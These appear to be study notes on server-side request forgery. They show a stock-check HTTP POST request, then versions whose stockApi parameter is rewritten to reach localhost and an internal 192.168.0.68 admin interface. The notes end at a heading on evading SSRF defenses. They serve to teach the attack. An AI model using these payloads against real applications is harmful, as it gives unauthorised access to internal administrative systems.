## Common Attacks Attacks Against the Server Itself - Attacker induces the application to make an HTTP request back to the server that is hosting the application (via loopback) - Involves supplying the URL with a hostname like 127.0.0.1 or localhost - Example code -- shopping application that allows user to check stock ``` POST /product/stock HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: 118 stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D 6%26storeId%3D1 ``` - Makes request to the URL - Retrieves the stock status - Return to the user - Modify this for an attack: ``` POST /product/stock HTTP/1.0 Content-Type: application/x-www-form- urlencoded Content-Length: 118 stockApi=http://localhost/admin ``` - Server fetches contents of the /admin url and returns to the user - Authenticates as the machine/server itself Attacks Against Other Systems - Assume there is an administrative interface at https://192.168.0.68/admin - Attack can exploit and access this: ``` POST /product/stock HTTP/1.0 Content-Type: application/x-www-form- urlencoded Content-Length: 118 stockApi=http://192.168.0.68/admin ``` Circumventing Common SSRF Defenses